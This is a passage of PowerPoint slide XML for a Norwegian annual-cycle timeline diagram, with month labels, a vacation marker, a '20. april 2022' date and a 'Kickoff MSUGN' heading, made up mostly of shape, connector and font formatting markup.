                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
              <a:effectLst/>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400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="Shape 139">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C96809-7163-41A1-A517-8A1B495D6DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="913558">
                <a:off x="6057947" y="2636709"/>
                <a:ext cx="393347" cy="222161"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>JAN</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 140">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418F1741-3B7A-4039-98D6-23A3C439D444}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2744011">
                <a:off x="6532775" y="2921528"/>
                <a:ext cx="373760" cy="215258"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>FEB</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 141">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB6952F-335B-470E-9EEA-1A579F62F552}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="4539813">
                <a:off x="6750701" y="3368701"/>
                <a:ext cx="425175" cy="204007"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>MAR</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 142">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AA6C6AF-AD05-438C-9ED0-2E2B0403F628}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="17172451">
                <a:off x="6722818" y="3917537"/>
                <a:ext cx="460280" cy="208817"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>APR</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 143">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D62D702-344E-464F-A465-1770591B6AA1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="18921377">
                <a:off x="6499240" y="4350146"/>
                <a:ext cx="384177" cy="173571"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>MAI</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 144">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{513442AD-8B35-45B0-92B7-EFEC4E962DD6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20509838">
                <a:off x="6051631" y="4607061"/>
                <a:ext cx="403162" cy="193464"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>JUN</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E49FDF94-3759-4097-80BC-10FD81A61F91}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="784198">
                <a:off x="5510227" y="4617993"/>
                <a:ext cx="375361" cy="165242"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>JUL</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824495DB-2C87-4E89-9588-4C4A91472F64}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2527224">
                <a:off x="5015992" y="4345078"/>
                <a:ext cx="404766" cy="162781"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>AUG</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5704135-E7FB-42C3-AD88-26DC78FBF565}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20658100">
                <a:off x="5465515" y="2686968"/>
                <a:ext cx="376138" cy="167898"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>DES</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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hape 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3B31A7-D152-4689-85E4-AF1F56592A66}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5955113" y="4689722"/>
                <a:ext cx="0" cy="475552"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="19" name="Shape 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57300EC1-1520-47C3-83D5-A5E4D3DEE89E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="6927170" y="3733081"/>
                <a:ext cx="490187" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Shape 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5363934A-20B8-4036-90F8-D1AB64E6E1C7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="4480169">
                <a:off x="4725912" y="3894442"/>
                <a:ext cx="432654" cy="196977"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>SEPT</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 148">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17176CEB-A75A-42DE-9930-C0C135D2943F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="17364057">
                <a:off x="4754772" y="3346494"/>
                <a:ext cx="407952" cy="178793"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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00" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>OKT</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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Shape 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38E3AEB6-75FA-4F2F-A811-DE4DD69228FD}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="18782899">
                <a:off x="5014504" y="2931482"/>
                <a:ext cx="420519" cy="173037"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>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b-NO" sz="1000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:prstClr val="white"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="Calibri"/>
                    <a:cs typeface="Calibri"/>
                    <a:sym typeface="Calibri"/>
                  </a:rPr>
                  <a:t>NOV</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="nb-NO"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 name="Shape 153">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC74E015-DCD4-41C1-8412-C5CFBC0BD1C0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="4488233" y="3733081"/>
                <a:ext cx="484374" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="24" name="Shape 152">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B443842A-0439-4EE0-9A3B-91655760B88A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5955113" y="2298947"/>
                <a:ext cx="0" cy="470923"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="sm" len="sm"/>
                <a:tailEnd type="none" w="sm" len="sm"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="TextBox 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D513DE70-69A9-4AE9-9B6C-82A7E8E03FBE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="975692">
              <a:off x="5185641" y="5316026"/>
              <a:ext cx="663980" cy="2212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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Vacation</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="nb-NO"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3ED38491-02B9-4261-B6E0-8E5B987F0C5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6098557" y="2317130"/>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 name="Elbow Connector 269">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03D42EE5-6653-4570-A86C-26267E8A3D0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="26" idx="7"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="6137580" y="1630118"/>
              <a:ext cx="1208836" cy="693707"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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728A410-D377-4C8F-A1F9-02B65C1F0838}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8749364" y="4565377"/>
              <a:ext cx="1331635" cy="5407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2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>20. april 2022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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Kickoff</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="nb-NO" sz="1800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> MSUGN</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Oval 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B03AC9-8F4C-4CF9-8E63-81D6B8F0F3D1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6306225" y="4852723"/>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5CB59035-304E-4F60-8292-42E3568B0EE0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6849145" y="454485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val 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7877CD6-11A4-46DF-BE97-B82999C23D41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6486333" y="4801931"/>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val 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71F2DA25-3FFD-4E63-9506-3B2B591D9744}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4127673" y="3282433"/>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5" name="Elbow Connector 336">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71D7AAB2-171B-455A-9227-46B9457C6CAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="34" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="2449990" y="3305293"/>
              <a:ext cx="1677683" cy="352567"/>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1AB691A9-5D79-409D-9752-1635679AB08B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4464419" y="3840142"/>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C52BBC33-2891-417B-8819-E3BFB030067F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6225511" y="5375695"/>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3B75F499-0772-4887-8A22-96DC990DAEF6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7288842" y="3519360"/>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1" name="Elbow Connector 211">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55ED4824-B4B5-42C0-ABC0-DDB3124FE176}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
